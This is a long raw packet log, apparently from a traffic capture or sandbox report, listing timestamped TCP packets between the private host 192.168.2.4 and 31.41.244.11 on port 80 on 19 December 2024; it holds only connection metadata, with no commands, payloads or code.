                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.795080900 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.933216095 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.933321953 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.933373928 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.933526993 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.933589935 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.933649063 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.933690071 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.933809042 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.934384108 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.934525967 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.934565067 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.935051918 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.935478926 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.935533047 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.935642004 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.936475039 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.936531067 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.936572075 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.936606884 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.937491894 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.937627077 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.937671900 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.937864065 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.938536882 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.938591957 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.938627005 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.938671112 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.939573050 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.939694881 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.939697981 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.939802885 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.940658092 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.940712929 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.940836906 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.941664934 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.941798925 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.941838980 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.942112923 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.942718983 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.942797899 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.942825079 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.942884922 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.943795919 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.943851948 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.943897963 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.943947077 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.944804907 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.944879055 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.944891930 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.945027113 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.945842028 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.945945024 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.945954084 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.946039915 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.946877003 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.946954966 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.946959972 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.947035074 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.947930098 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.948031902 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.948033094 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.948103905 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.948965073 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.949063063 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.949084044 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.949240923 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.949974060 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.950045109 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.950082064 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.950216055 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.951046944 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.951122999 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.951157093 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.952007055 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.952066898 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.952172041 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.952425957 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.953111887 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.953197956 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.953214884 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.953313112 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.954195023 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.954353094 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.954395056 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.955199003 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.955306053 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.955363989 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.955709934 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.956218958 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.956295967 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.956337929 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.956459045 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.957279921 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.957398891 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.957438946 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.957568884 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.958328962 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.958445072 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.958518028 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.958601952 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.959469080 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.959506035 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.959573984 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.960397005 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.960501909 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.960532904 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.960609913 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.961431980 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.961538076 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.961566925 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.961667061 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.962505102 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.962611914 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.962630033 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.962795019 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.963617086 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.963670015 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.963712931 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.963773966 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.964586020 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.964713097 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.964713097 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.964827061 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.965615988 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.965703011 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.965718031 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.965776920 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.966623068 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.966732025 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.966763973 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.966821909 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.967708111 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.967789888 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.967829943 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.967907906 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.968727112 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.968872070 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.968909025 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.968980074 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.969768047 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.969892025 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.970808029 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.970839977 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.970865965 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.970953941 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.971851110 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.971971035 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.972891092 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.972924948 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.972991943 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.973023891 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.973218918 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.973963022 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.974057913 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.974077940 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.974147081 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.974996090 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.975065947 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.975131035 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.975236893 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.976030111 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.976102114 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.976133108 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.976206064 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.977061033 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.977163076 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.977199078 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.977274895 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.978087902 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.978228092 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.978259087 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.978305101 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.979203939 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.979266882 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.979306936 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.979441881 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.980218887 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.980325937 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.980334044 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.980391026 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.981276989 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.981385946 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.981420040 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.981471062 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.982314110 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.982367992 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.982388973 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.982436895 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.983331919 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.983424902 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.983436108 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.983524084 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.984405994 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.984507084 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.984565973 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.984565973 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.985435009 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.985498905 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.985546112 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.986413002 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.986438036 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.986512899 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.986624956 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.987487078 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.988123894 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.125260115 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.125394106 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.125679970 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.125766039 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.125900030 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.125943899 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.126101971 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.126863003 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.126971960 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.127059937 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.127870083 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.128031969 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.128038883 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.128873110 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.129002094 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.129041910 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.129947901 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.129996061 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.130050898 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.130120039 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.130994081 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.131046057 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.131062984 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.132010937 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.132072926 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.132126093 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.132163048 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.132246017 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.133064985 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.133193016 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.133455992 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.134105921 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.134212971 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.134249926 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.135112047 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.135255098 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.135293007 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.136100054 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.136157990 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.136261940 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.136302948 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.136353016 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.137190104 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.137312889 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.137376070 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.138246059 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.138372898 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.138413906 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.138559103 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.139302969 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.139422894 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.140005112 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.140321016 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.140441895 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.140480995 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.140749931 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.141357899 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.141449928 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.141510963 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.142425060 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.142533064 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.142570019 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.142679930 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.143459082 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.143569946 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.143608093 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.143949986 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.144511938 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.144617081 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.144658089 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.145549059 CET804978731.41.244.11192.168.2.4
